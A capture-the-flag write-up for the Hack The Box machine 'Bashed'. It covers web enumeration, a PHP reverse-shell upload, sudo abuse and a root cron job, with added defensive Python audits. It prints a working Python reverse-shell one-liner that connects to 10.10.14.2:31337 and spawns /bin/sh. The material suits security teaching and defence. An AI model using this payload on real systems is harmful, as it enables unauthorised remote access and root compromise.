Bashed — HTB

Sanaullah Aman Korai
Jun 27, 2023


Nmap Scan

nmap -A -T4 10.10.10.68 -oN Bashed -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-26 20:15 EDT
Nmap scan report for 10.10.10.68
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds

From the nmap results we can see there is only one port open, and it's running Apache httpd 2.4.18 (Ubuntu). Let's enumerate the web server.

The server is running phpbash. Now let's enumerate the directories.

Found some interesting directories:
/uploads
/dev

We got a web shell exposed, but it's not a persistent one. I tried reverse shells from it, but they didn't work. As I enumerated earlier, there is an uploads directory too, so we will transfer our PHP reverse shell to the machine. On your Kali machine, copy the PHP reverse shell from /usr/share/webshells/php and modify the IP and port. Then set up a Python web server and transfer it to the target box.

The file has been uploaded. Now set up a listener and execute the file to get the reverse shell.
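The upload path above is the weakness a defender would want to catch: an upload directory that accepts, stores and serves files the web server will execute. As an added example that is not part of the original write-up, here is a small Python audit that walks an upload directory and flags anything a PHP-enabled server might run. The directory and its files are constructed inline so it runs offline; the extension list and the function names are my own assumptions.

```python
"""Audit a web-accessible upload directory for server-side script content.

Added example, not code from the original write-up. The directory and its
files are constructed below so the check runs offline; the extension list
is an assumption to tune to the server's real handler configuration.
"""
import os
import re
import tempfile

# Extensions Apache/mod_php commonly hands to the PHP interpreter (assumed list).
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
# A PHP open tag anywhere in the leading bytes, whatever the extension says.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def audit_upload_dir(root):
    """Return sorted (relative_path, reason) pairs for files that should not
    sit in an upload directory.

    Two independent checks per file:
      * any extension segment of the name is an interpreter extension, which
        also catches double extensions such as pic.php.jpg;
      * the first 4 KiB contain a PHP open tag, which catches scripts hidden
        behind an image extension (polyglot or simply renamed).
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # every extension segment after the first dot, lower-cased
            segments = {"." + s for s in name.lower().split(".")[1:]}
            if segments & SCRIPT_EXTENSIONS:
                findings.append((rel, "script extension"))
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if PHP_OPEN_TAG.search(head):
                findings.append((rel, "php open tag in content"))
    return sorted(findings)


def build_sample_upload_dir():
    """Create a throwaway directory holding constructed sample uploads."""
    root = tempfile.mkdtemp(prefix="uploads_demo_")
    samples = {
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,        # benign image
        "readme.txt": b"plain text, nothing to see",             # benign text
        "shell.php": b"<?php phpinfo(); ?>",                      # script by name and content
        "pic.php.jpg": b"\xff\xd8\xff\xe0 JFIF",                  # double extension
        "avatar.jpg": b"\xff\xd8\xff\xe0 JFIF <?php echo 1; ?>",  # script behind an image name
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    demo = build_sample_upload_dir()
    for rel, reason in audit_upload_dir(demo):
        print(f"{rel}: {reason}")
```

Detection is the fallback; the fix is to make the directory inert, for example by storing uploads outside the document root, or by turning the interpreter off for that path (with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for the uploads path) so a stored .php file is served as bytes rather than executed.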

Start with LinEnum.sh to get info about privesc. This section stands out:

www-data can sudo as scriptmanager:
We can sudo without supplying a password!
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

Easy to get a shell as scriptmanager: sudo -u scriptmanager /bin/bash

Now scriptmanager has access to a folder that www-data could not access:

Most interesting is that test.txt is owned by root and seems to be the output of the test.py script, which is writable by scriptmanager.

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py

As expected, there's a cron job running the scripts in the /scripts directory as root.
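Both findings above (the NOPASSWD rule for www-data and a root cron job executing a script another user can edit) are things a host audit should surface before anyone lands a shell. As an added example that is not part of the original post, the Python below parses the rule section of `sudo -l` output for NOPASSWD entries and checks a cron script directory for entries that are not root-owned or are group/other writable. The `sudo -l` text and the script directory are constructed here (the NOPASSWD line is the one the write-up shows; the second rule is made up for contrast), and the function names are my own.

```python
"""Defender-side audit for the two privilege-escalation paths in the
write-up: a NOPASSWD sudo rule that lets www-data become another user, and
a root cron job running scripts that a non-root user can modify.

Added example, not from the original post. The `sudo -l` text and the
directory below are constructed for the demo; the NOPASSWD rule line is the
one the write-up shows, the systemctl rule is invented for contrast.
"""
import os
import re
import stat
import tempfile

# One rule as printed by `sudo -l`:  (runas_user : runas_group) TAG: TAG: command
SUDO_RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""


def find_nopasswd_rules(sudo_l_output):
    """Return [{'runas': ..., 'cmd': ...}] for every NOPASSWD rule in the
    'may run the following commands' section of `sudo -l` output."""
    rules, in_rules = [], False
    for raw in sudo_l_output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = SUDO_RULE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        if "NOPASSWD" in tags:
            rules.append({"runas": m.group("runas").strip(), "cmd": m.group("cmd").strip()})
    return rules


def classify_entry(uid, mode, trusted_uids=(0,)):
    """Reasons a file run by a root cron job is unsafe: wrong owner, or a
    group/other write bit that lets a non-owner rewrite it."""
    reasons = []
    if uid not in trusted_uids:
        reasons.append(f"owned by uid {uid}, not a trusted uid")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group/other writable")
    return reasons


def audit_cron_scripts(scripts_dir, trusted_uids=(0,)):
    """Check the directory itself (a writable directory allows replacing a
    script by rename) and every entry in it. Returns (label, reason) pairs."""
    entries = [(".", scripts_dir)] + [
        (name, os.path.join(scripts_dir, name)) for name in sorted(os.listdir(scripts_dir))
    ]
    findings = []
    for label, path in entries:
        st = os.lstat(path)
        for reason in classify_entry(st.st_uid, st.st_mode, trusted_uids):
            findings.append((label, reason))
    return findings


def build_sample_scripts_dir():
    """Constructed stand-in for /scripts: one script left group-writable."""
    root = tempfile.mkdtemp(prefix="scripts_demo_")  # mkdtemp creates it 0700
    for name, mode in (("backup.sh", 0o755), ("test.py", 0o664), ("test.txt", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("# placeholder\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for rule in find_nopasswd_rules(SAMPLE_SUDO_L):
        print(f"NOPASSWD rule: run as ({rule['runas']}) -> {rule['cmd']}")
    demo = build_sample_scripts_dir()
    # The demo directory is owned by whoever runs this, so treat that uid as
    # trusted and exercise only the permission check.
    for label, reason in audit_cron_scripts(demo, trusted_uids={os.getuid()}):
        print(f"{label}: {reason}")
```

On a real host the ownership check is the one that matters for this box: a script owned by scriptmanager but executed by root's crontab is the finding, even with mode 0644. The fix is for anything root cron runs to be root-owned, in a root-owned directory, and not writable by group or other.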

Thank you for reading :)
